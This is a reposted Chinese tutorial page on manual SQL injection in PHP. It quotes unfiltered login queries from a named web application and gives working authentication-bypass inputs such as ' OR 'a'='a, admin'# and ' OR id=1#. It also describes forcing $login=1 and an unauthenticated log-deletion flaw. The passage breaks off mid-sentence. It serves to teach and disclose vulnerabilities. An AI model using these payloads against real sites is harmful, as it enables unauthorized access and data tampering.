当前位置: 首页 > 图文教程 > 网络编程 > PHP > 手工注射php学习

PHP
PHP常用代码
小偷PHP+Html+缓存
PHP 常见郁闷问题答解
上传多个文件的PHP脚本
详解::如何将图片储存在数据库里
PHP生成静态页面详解
[PHP]模板引擎Smarty深入浅出介绍
PHP语法速查表
一些常用的php函数
让你的WINDOWS同时支持MYSQL4,MYSQL4.1,MYSQL5X
PHP经典的给图片加水印程序
PHP 字符串操作入门教程
source.php查看源文件
main.php
Php部分常见问题总结
[PHP] 《PHP边学边教》(01.开篇:准备工作)
《PHP边学边教》(02.Apache+PHP环境配置:上篇)
《PHP边学边教》(02.Apache+PHP环境配置:下篇)
傻瓜化配置PHP环境:Appserv
《PHP边学边教》(04.编写简易的通讯录:视频教程1)

PHP 中的 手工注射php学习


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-11-03   浏览: 97 ::
收藏到网摘: n/a

转自:http://www6.blog.163.com/article/-2jc4-x8C13g.html

代码: 
$conn=sql_connect($dbhost, $dbuser, $dbpswd, $dbname); 
$password = md5($password); 
$q = "select id,group_id from $user_table where username='$username' and password='$password'"; 
$res = sql_query($q,$conn); 
$row = sql_fetch_row($res); 

$q = "select id,group_id from $user_table where username='$username' and password='$password'"中 
$username 和 $password 没过滤, 很容易就绕过。 
对于select * from $user_table where username='$username' and password='$password'这样的语句改造的方法有: 

构造1(利用逻辑运算):$username=' OR 'a'='a $password=' OR 'a'='a 

相当于sql语句: 
select * from $user_table where username= OR 'a'='a' and password= OR 'a'='a' 

构造2(利用mysql里的注释语句# ,/* 把$password注释掉):$username=admin'#(或admin'/*) 

即: 
select * from $user_table where username='admin'#' and password='$password'" 

相当于: 
select * from $user_table where username='admin' 

在admin/login.php中$q语句中的$password在查询前进行了md5加密所以不可以用构造1中的语句绕过。这里我们用构造2: 

select id,group_id from $user_table where username='admin'#' and password='$password'" 

相当于: 
select id,group_id from $user_table where username='admin' 

只要存在用户名为admin的就成立,如果不知道用户名,只知道对应的id, 
我们就可以这样构造:$username=' OR id=1# 

相当于: 
select id,group_id from $user_table where username='' OR id=1# and password='$password'(#后的被注释掉) 

我们接着往下看代码: 
if ($row[0]) { 
// If not admin or super moderator 
if ($username != "admin" && !eregi("(^|&)3($|&)",$row[1])) { 
$login = 0; 


else { 
$login = 1; 


// Fail to login
--- 
if (!$login) { 
write_log("Moderator login","0","password wrong"); 
echo "<script>alert('login failed!');history.go(-1);</script>"; 
exit(); 

// Access ! 

else { 
session_start(); 

呵呵~~ 最后简单通过一个$login来判断,我们只要ie提交直接提交$login=1 就可以绕过了 :)。 


2.users/login.php注射导致绕过身份验证漏洞: 
代码: 
$md5password = md5($password); 
$q = "select id,group_id,email from $user_table where username='$username' and password='$md5password'"; 
$res = sql_query($q,$conn); 
$row = sql_fetch_row($res); 

$username没过滤利用同1里注释掉and password='$md5password'";就绕过啦。 


3.adminloglist.php存在任意删除日志记录漏洞。(ps:这个好象和php+mysql注射无关,随便提一下) 

okphp的后台好象写得很马虎,所有文件都没有判断管理员是否已经登陆,以至于任意访问。我们看list.php的代码: 

$arr = array("del_log","log_id","del_id"); 
get_r($arr); 
// 
if ($del_log) { 
省略........ 
if ($log_id) { 
foreach ($log_id as $val) { 
$q = "delete from $log_table where id='$val'"; 
$res = sql_query($q,$conn); 
if ($res) { 
$i++; 



elseif ($del_id) { 
$q = "delete from $log_table where id='$del_id'"; 
$res = sql_query($q,$conn); 

$tpl->setVariable("message","$i log deleted ok!"); 
$tpl->setVariable("action","index.php?action=list_log"); 


代码就只简单的用get_r($arr);判断的提交的参数,我